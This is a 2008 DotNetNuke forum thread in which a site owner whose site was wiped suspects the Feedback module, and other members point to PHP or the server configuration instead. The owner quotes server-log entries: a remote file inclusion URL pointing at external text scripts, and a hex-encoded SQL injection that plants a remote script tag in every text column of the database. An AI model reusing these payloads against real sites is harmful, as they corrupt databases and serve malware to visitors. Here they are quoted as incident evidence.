Products

Evoq Content Overview Content Creation Workflow Asset Management Mobile Responsive Personalization Content Analytics SEO Integrations Security Website PerformanceEvoq Engage Overview Community Management  Dashboard  Analytics  Member Profile Gamification Advocate Marketing Community Engagement  Ideas  Answers  Discussions  Groups  Wikis  Events Mobile ReadyDNN Support PackagesEvoq: CMS FeaturesEvoq OnDemandCompare DNN's CMS Products

Solutions

Content Management SystemMulti-Channel PublishingDigital MarketingOnline Community ManagementIntranet Software SolutionOur CustomersPrime

Resources

Test DrivesSchedule A DemoDocumentation CenterWebinarsWhite PapersProduct ManualsRequest PricingData SheetsCase StudiesEvoq Preferred Products Content Management Ecommerce Forms Identity Management and Authentication Site Management Social Themes

Partners

DNN Partners Partner Directory Become a DNN Partner Partner Program Overview  Hosting  Implementation  ISV  Training  Competencies

Community

Participate Ask a Question Forums Community Showcase DNN MVP  Program Overview  Lifetime MVPs  Honorary MVPs Subscribe to DNN Digest Advisory Groups  Awareness Advisory Group  Developer Advisory Group  Partner Advisory Group  Technology Advisory GroupLearn Documentation Wiki Community Blog Video Library Project History Development RoadmapDownload DNN Store Language Packs Manuals Nightly BuildsSecurity Policies Security Center

Blog

About

News Press Releases News Coverage Press KitCareersContact DNN

QA

Ideas Test

New Community Website

Ordinarily, you'd be at the right spot, but we've recently launched a brand new community website... For the community, by the community.

Yay... Take Me to the Community!

Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen
HomeHomeDNN Open Source...DNN Open Source...Module ForumsModule ForumsFeedbackFeedbackSevere Security IssueSevere Security Issue
Previous
 
Next
New Post
9/1/2008 5:15 AM
 
abstraction

Joined: 2/18/2008
Posts: 78

Hi there,

Now I'm not a hacker in any sense of the word, but I am a professional software engineer and am more than capable of making a safe website.

Anyway, my site got completely destroyed over the weekend, the root of my site was deleted, everything gone!  And considering all my site does is give people a chance to download my DJ mixes it's extremely sad.  But with that aside, I think that one of the possible holes was actually this Feedback module.

Consider the following URL,

/dnn/Guestbook/tabid/61/ include_path=http://albcrew.tw35.com/pw.txt?

I see URLS like this throughout my logs but pointing to various different scripts.  That particular one actually acquired a load of information then echo it.  I've got loads of things i'm currently looking at, including encoded SQL code being passed to some modules including the Repository module and a forum module that I actually purchased.

Anyway, hopefully this information might be of some use, any input on this would be fantastic.
 
New Post
9/1/2008 11:25 AM
 
Sanjay Mehrotra

www.acuitisolutions.com
Joined: 5/30/2003
Posts: 591

Abstraction,
I feel bad about your loss but would like to point out that the feedback module goes through the same rigorous tests as ANY of the other core modules. Since you're not sure about the cause of the hack yourself, it would be appreciated if you do not attempt to spread panic with other users of the module till you can either confirm that this was indeed the source of the issue or work with the core to identify the issue. We have a specific way by which security issues are reported to the core and you can read more about it here first. 

What version of DotNetNuke itself were you running for starters?


Sanjay

AcuitiDP - Oracle Data Provider for DotNetNuke
 
New Post
9/1/2008 11:50 AM
 
Sebastian Leupold


Sebastian Leupold's Avatar

Sebastian Leupold's Avatar

Sebastian Leupold's Avatar

Sebastian Leupold's Avatar

www.dnnwerk.de
Joined: 3/8/2004
Posts: 46212

Abstraction,

please notice, that the inclusion of virtual path "Guestbook" does not mean, that the guestbook has been used for intrusion, actually I assume that DNN has not been hacked at all, otherwise default.aspx or another physically existing core or module file would be needed to be shown. This looks like an automated attack trying to find a vulnarability, however it is more likely that this has been found at another software, either IIS or FTP configuration for example. If you need assistance to identify the hole, please contact security (at) dotnetnuke.com and provide as much details as possible. Thank you.

Cheers from Germany,
Sebastian Leupold

dnnWerk - The DotNetNuke Experts   German Spoken DotNetNuke User Group

Speed up your DNN Websites with TurboDNN
 
New Post
9/1/2008 12:01 PM
 
abstraction

Joined: 2/18/2008
Posts: 78

Sanjay Mehrotra wrote
 

Abstraction,
I feel bad about your loss but would like to point out that the feedback module goes through the same rigorous tests as ANY of the other core modules. Since you're not sure about the cause of the hack yourself, it would be appreciated if you do not attempt to spread panic with other users of the module till you can either confirm that this was indeed the source of the issue or work with the core to identify the issue. We have a specific way by which security issues are reported to the core and you can read more about it here first. 

What version of DotNetNuke itself were you running for starters?


Sanjay

Hi Sanjay,

I don't really see what the problem was with my original post, the issue was clearly stated, and I haven't said that this module is the problem, I've said it's a possible cause of the problem, which it is.  My site was compromised via DNN, so all modules have to be taken in for consideration, am I wrong?  One thing I have done is stopped PHP on my server which will more than likely help with allot of this.

I was running dnn 4.8.2.  Modules I have had installed (all latest versions) were

Repository Module (2 of them)
News Module with RSS feed on home page
Feedback Module on separate page called Guestbook
Presstopia Forum (Also contacted and notified of said problem), on Forum page
Chat module http://www.dotnetnuke.com/DotNetNukeProjects/ModuleChat/tabid/965/Default.aspx, on a page that was barely used

I know FTP wasn't an issue as this was merely pointing to an empty folder outside of the root of the site.

User registrations were open and for this reason I have had to disable all that and do not trust that side of DotNetNuke as this has now happened twice.  Both times with  the same modules and has caused me allot of time.  My logs are full of all types of attacks but mainly around the same modules,

eg.

/dnn/Guestbook/tabid/61/ include_path=http://grandmalibby4u.com/galleries/extreme/on.txt?
 

/dnn/Guestbook/tabid/61/Default.aspx ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343
0303029204445434C415245205461626C655F437572736F7220435552534F5220464F52207365
6C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C73
7973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E787479706
53D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220
622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655
F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F722049
4E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494
E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D272
7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F75
68756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B2
72B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E6
36E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4
558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E44204
34C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572
736F72%20AS%20CHAR(4000));EXEC(@S);

/dnn/Guestbook/tabid/61/Default.aspx ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430
303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737
973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E7874797065

3D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F72206
22E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F
437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494
E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E
20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727
223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F756
8756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B2
72B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E
636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204
E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572
736F72%20AS%20CHAR(4000));EXEC(@S);

the last 2 inject some scripts from other sources which are now offline, they seemed to return MYSQL information.  Only the forum module and the feedback module recieved these types of attack.

Anyway I'm still not 100% definite of the exact point it snapped as I'm still going through the logs, but I do know that the author of the Presstopia forum has said that he hasn't been compromised in this way yet, but still, I have to keep narrowing down of course, so I have not pointed fingers at anything yet, just merely pointing out where the possibilities lie.

Nick.
 
New Post
9/1/2008 1:06 PM
 
Sanjay Mehrotra

www.acuitisolutions.com
Joined: 5/30/2003
Posts: 591

"One thing I have done is stopped PHP on my server which will more than likely help with allot of this."
 

Nick - I believe you've solved your own problem. Like I'd posted on the other thread which you made on the forums, the culprit is likely to be PHP and NOT DNN. You can take the exact script you've posted here and run it on any of the websites that have the feedback module installed (mothership included) and you will not see your problem.
Someone probably did a scan on your machine and discovered that you have PHP installed and was able to take advantage of that via your website.

I've done my limited research based on what you've posted so far and Cathal will probably comment on this shortly too.

My problem with your original post is making it sound like feedback module is the culprit when you're not sure - or let me put it another way - Can you prove 100% that the feedback module caused your server to be hacked?

I'm not going to get into the semantics but as mentioned before, any security issues need to be addressed differently than simply posting on a thread without any proper validation.

Sanjay

AcuitiDP - Oracle Data Provider for DotNetNuke
 
 Page 1 of 2
12Next 
Previous
 
Next
HomeHomeDNN Open Source...DNN Open Source...Module ForumsModule ForumsFeedbackFeedbackSevere Security IssueSevere Security Issue


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out